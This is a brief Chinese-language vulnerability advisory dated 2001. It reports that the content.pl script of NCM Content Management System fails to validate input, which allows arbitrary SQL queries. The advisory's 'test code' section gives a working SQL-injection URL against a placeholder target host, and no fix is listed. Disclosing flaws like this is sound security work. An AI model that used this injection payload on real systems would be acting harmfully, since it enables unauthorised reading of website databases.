NCM内容管理系统的content.pl存在输入合法性检查漏洞发布时间:2001-04-16 更新时间:2001-04-16 严重程度:中 威胁程度:其它 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 NCM Content Management System详细描述 NCM Content Management System 设计用来管理WEB材料和其他数据,及 提供数据库接口。 其中NCM存在问题可以导致用户执行任意SQL查询,因为content.pl脚本对 输入没有进行合法性检查,所以对使用加入某些符号进行对数据库表的查询 命令。如提交<和>的符号可以导致执行任意SQL查询。 测试代码 http://www.TARGET/content.pl?group=49&id=140%20or%20id>0%20or%20ls_id<1000%20or%20kategorie<10000%20or%20kategorie>10%20or%20ls_id>1%20or%20id<10%20or%20kategorie<10%20or%20kategorie>4&shortdetail=1 解决方案 尚无 相关信息 |
